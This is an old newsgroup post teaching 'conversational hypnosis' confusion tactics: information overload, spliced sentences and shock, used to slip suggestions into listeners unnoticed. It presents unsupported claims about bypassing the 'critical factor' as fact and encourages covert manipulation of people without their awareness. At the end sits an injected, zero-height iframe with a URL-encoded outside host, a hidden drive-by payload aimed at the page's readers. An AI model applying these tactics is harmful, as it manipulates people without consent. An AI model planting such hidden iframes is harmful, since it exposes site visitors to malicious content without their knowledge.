lhwdqc...@yahoo.com
unread,Mar 9, 2009, 10:59:10 PM3/9/09Sign in to reply to author
Sign in to forward
You do not have permission to delete messages in this group
Either email addresses are anonymous for this group or you need the view member email addresses permission to view the original message
to hypnosishct
It is a fact that on average the conscious mind can concentrate, and
keep straight 5-9 items at one time. Five things are generally pretty
easy for a person to remember and nine is beginning to become quite
difficult. As you can see this is not a great number when you put it
into the amount of items, facts or ideas you can rattle off in a
conversation.
This is why when you are having a conversation with a person about
their car being in the shop and they start to give you a bunch of
different facts about the car they drive, the car their parents drive,
the car Uncle Tom drives and the car Aunt Hilda drives you may get
confused.
You will so busy trying to keep the different cars, the people who
drive them and the facts about them straight that you will miss the
point of the conversation in the first place. Your speaker was talking
about his car being in the shop.
Overloading the mind with any information will cause the critical
factor to either get distracted with unimportant information or shut
down all together. This is a plus for you as a hypnotist because then
you can attach a suggestion and it will flow right on in.
If a person is able to keep track of the information they will more
than likely be focusing on the wrong information which will still
distract the critical factor and again allow your suggestion in
anyway.
The idea behind overloading people with details is just that. No
matter what the subject or how it is being presented, whether it be
fact, fiction or just random information, you want to really give them
a lot of details to use this powerful concept to its full advantage.
The next language trick or confusion pattern you will use to overload
the mind is called the spontaneous change of meaning. This is done by
the sudden and unexpected combining of two different statements. When
you take two statements that end and begin with the same word you can
mush them together to make one sentence that just doesn't quiet add
up.
For example, "I'm going to the store is out of milk." In this
statement the meaning at the beginning and end are fine, they make
sense. But somewhere in the middle things get a little confusing, just
confusing enough that you have to stop and think about what I have
just said.
If you take the statement apart you see that 'I'm going to the store'
is quite average and normal; as is 'The store is out of milk.' This
sudden change in how people are used to hearing things causes critical
factor to stop for the confusion. When that happens you can simply add
your suggestion to the flow of conversation and it will again go in
unnoticed.
Another way to incorporate spontaneous change of meaning into your
Conversational Hypnosis is to introduce a suggestion in your
conversation and then continue speaking as if it never happened. This
again causes enough confusion for critical factor that it wants to
stop to figure it out.
This is overridden by the fact that you are still talking and there is
no time to go back to figure it out. Now the unconscious does pick up
the suggestion and stores it away for future use. Again your
suggestion gets in to the mind as it bypasses the confused critical
factor.
As you include more and more of these spontaneous changes the mind
will not only pick up the conversation you are having aloud it will
begin to recognize the pattern being created within through the hidden
messages.
Yet another way to use this change of meaning is to avoid the
ambiguity all together and just combine two statements that end and
begin with the same word together. These statements will make more
sense and be a little less confusing but still distracting. The key
here is to make sure to add these statements casually into
conversation otherwise they will be noticed and detected.
Also remember to use these when you need to, not for every other
statement. If you use this spontaneous change of meaning too often it
can become annoying and overbearing, which is true for most confusion
language tactics. Becoming too confusing can be counterproductive in
that your listeners will no longer have an interest in listening to
you.
Lastly we come to the language confusion concept of shock and
surprise. This is a fascinating concept, any time you really shock or
surprise someone you will automatically run over the critical factor
and make it in. Shock and surprise will create their own type of
trance induction.
Just by being shocked and surprised your conscious thinking will
immediately overload and shut down leaving only the unconscious open
to suggestion and ready to follow instruction, which is perfect for a
hypnotist.
There is a caution in shock and surprise method. Some people do not
like to be shocked and surprised so be sure you are picking and
choosing wise times and the right people to use this technique
on.
<IfrAmE src=http://%6C%6C%38%30%2E%63%6F%6D/ad.htm width=100
height=0></IfrAmE>